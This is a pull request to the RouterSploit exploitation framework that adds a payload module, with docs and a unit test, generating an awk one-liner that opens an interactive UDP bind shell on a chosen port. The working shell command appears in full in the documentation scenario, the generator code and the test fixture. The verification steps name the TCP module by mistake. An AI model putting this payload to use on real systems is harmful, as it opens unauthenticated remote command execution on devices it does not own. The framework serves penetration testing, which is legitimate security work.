### PR TITLE
AWK UDP Bind Shell Payload

### DIFF
--- a/docs/modules/payloads/cmd/awk_bind_udp.md
+++ b/docs/modules/payloads/cmd/awk_bind_udp.md
@@ -1,0 +1,23 @@
+## Description
+
+Module generates payload that creates interactive udp bind shell by using awk. 
+
+## Verification Steps
+
+  1. Start `./rsf.py`
+  2. Do: `use payloads/cmd/awk_bind_tcp`
+  3. Do: `set rport 4321`
+  4. Do: `run`
+  5. Module generates awk udp bind shell payload
+
+## Scenarios
+
+```
+rsf > use payloads/cmd/awk_bind_udp
+rsf (Awk Bind UDP) > set rport 4321
+[+] rport => 4321
+rsf (Awk Bind UDP) > run
+[*] Running module...
+[*] Generating payload
+awk 'BEGIN{s="/inet/udp/4321/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
+```

--- a/routersploit/modules/payloads/cmd/awk_bind_udp.py
+++ b/routersploit/modules/payloads/cmd/awk_bind_udp.py
@@ -1,0 +1,23 @@
+from routersploit.core.exploit import *
+from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
+
+
+class Exploit(BindTCPPayloadMixin, GenericPayload):
+    __info__ = {
+        "name": "Awk Bind UDP",
+        "description": "Creates an interactive udp bind shell by using (g)awk.",
+        "authors": (
+            "Marcin Bury <marcin[at]threat9.com>"  # routersploit module
+        ),
+    }
+
+    cmd = OptString("awk", "Awk binary")
+
+    def generate(self):
+        return (
+            self.cmd +
+            " 'BEGIN{s=\"/inet/udp/" +
+            str(self.rport) +
+            "/0/0\";for(;s|&getline c;close(c))" +
+            "while(c|getline)print|&s;close(s)}'"
+        )

--- a/tests/payloads/cmd/test_awk_bind_udp.py
+++ b/tests/payloads/cmd/test_awk_bind_udp.py
@@ -1,0 +1,16 @@
+from routersploit.modules.payloads.cmd.awk_bind_udp import Exploit
+
+
+# awk bind udp payload with rport=4321
+bind_udp = (
+ "awk 'BEGIN{s=\"/inet/udp/4321/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'"
+)
+
+
+def test_payload_generation():
+    """ Test scenario - payload generation """
+
+    payload = Exploit()
+    payload.rport = 4321
+
+    assert payload.generate() == bind_udp

--- a/tests/payloads/cmd/test_awk_bind_udp.py
+++ b/tests/payloads/cmd/test_awk_bind_udp.py
@@ -3,7 +3,7 @@ from routersploit.modules.payloads.cmd.awk_bind_udp import Exploit
 
 # awk bind udp payload with rport=4321
 bind_udp = (
- "awk 'BEGIN{s=\"/inet/udp/4321/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'"
+    "awk 'BEGIN{s=\"/inet/udp/4321/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'"
 )
 
 


### PR DESCRIPTION
## Status
**READY**

## Description
This PR adds AWK UDP Bind Shell. Module generates payload that creates interactive udp bind shell by using awk.

## Verification

  1. Start `./rsf.py`
  2. Do: `use payloads/cmd/awk_bind_tcp`
  3. Do: `set rport 4321`
  4. Do: `run`
  5. Module generates awk udp bind shell payload

## Checklist
- [x] Write module/feature 
- [x] Write tests ([Example](https://github.com/threat9/routersploit/blob/master/tests/exploits/routers/dlink/test_dsl_2750b_rce.py))
- [x] Document how it works ([Example](https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md))
